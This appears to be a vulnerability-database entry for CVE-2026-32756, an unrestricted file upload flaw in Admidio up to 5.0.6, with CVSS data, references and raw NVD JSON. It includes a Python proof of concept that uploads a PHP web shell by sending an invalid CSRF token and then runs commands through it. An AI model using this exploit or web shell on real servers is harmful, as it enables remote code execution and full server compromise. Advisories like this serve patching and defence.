CVE-2026-32756

Description

Admidio is an open-source user management solution. Versions 5.0.6 and below contain a critical unrestricted file upload vulnerability in the Documents & Files module. Due to a design flaw in how CSRF token validation and file extension verification interact within UploadHandlerFile.php, an authenticated user with upload permissions can bypass file extension restrictions by intentionally submitting an invalid CSRF token. This allows the upload of arbitrary file types, including PHP scripts, which may lead to Remote Code Execution on the server, resulting in full server compromise, data exfiltration, and lateral movement. This issue has been fixed in version 5.0.7.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* - VULNERABLE

Admidio <= 5.0.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Configuration
target_url = "http://example.com/admidio/adm_program/modules/documents-files/upload_handler_file.php"
attacker_cookie = {"PHPSESSID": "<authenticated_session_id>"} # Requires valid login

# Malicious PHP payload
php_payload = "<?php system($_GET['cmd']); ?>"

# Exploit Logic: Submit file with an invalid/missing CSRF token to bypass extension check
files = {
    'userfile': ('exploit.php', php_payload, 'application/x-php')
}

# Sending an invalid CSRF token triggers the bypass logic
data = {
    'csrf_token': 'INVALID_TOKEN_12345'
}

response = requests.post(target_url, files=files, data=data, cookies=attacker_cookie)

if response.status_code == 200 and "success" in response.text.lower():
    print("[+] Exploit successful! File uploaded.")
    print("[+] Access your shell at: /adm_my_files/exploit.php?cmd=whoami")
else:
    print("[-] Exploit failed.")
    print(response.text)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32756
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32756
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32756/
[4] VulDB https://vuldb.com/cve/CVE-2026-32756
[5] https://github.com/Admidio/admidio/releases/tag/v5.0.7
[6] https://github.com/Admidio/admidio/security/advisories/GHSA-95cq-p4w2-32w5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32756", "sourceIdentifier": "[email protected]", "published": "2026-03-20T00:16:16.763", "lastModified": "2026-03-23T16:51:44.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admidio is an open-source user management solution. Versions 5.0.6 and below contain a critical unrestricted file upload vulnerability in the Documents & Files module. Due to a design flaw in how CSRF token validation and file extension verification interact within UploadHandlerFile.php, an authenticated user with upload permissions can bypass file extension restrictions by intentionally submitting an invalid CSRF token. This allows the upload of arbitrary file types, including PHP scripts, which may lead to Remote Code Execution on the server, resulting in full server compromise, data exfiltration, and lateral movement. This issue has been fixed in version 5.0.7."}, {"lang": "es", "value": "Admidio es una solución de gestión de usuarios de código abierto. Las versiones 5.0.6 e inferiores contienen una crítica vulnerabilidad de carga de archivos sin restricciones en el módulo Documentos y Archivos. Debido a un fallo de diseño en cómo la validación del token CSRF y la verificación de la extensión de archivo interactúan dentro de UploadHandlerFile.php, un usuario autenticado con permisos de carga puede eludir las restricciones de extensión de archivo al enviar intencionadamente un token CSRF no válido. Esto permite la carga de tipos de archivo arbitrarios, incluyendo scripts PHP, lo que puede conducir a la ejecución remota de código en el servidor, resultando en un compromiso total del servidor, exfiltración de datos y movimiento lateral. Este problema ha sido solucionado en la versión 5.0.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.0.7", "matchCriteriaId": "3347E657-D132-4D87-A355-391136657A27"}]}]}], "references": [{"url": "https://github.com/Admidio/admidio/releases/tag/v5.0.7", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-95cq-p4w2-32w5", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}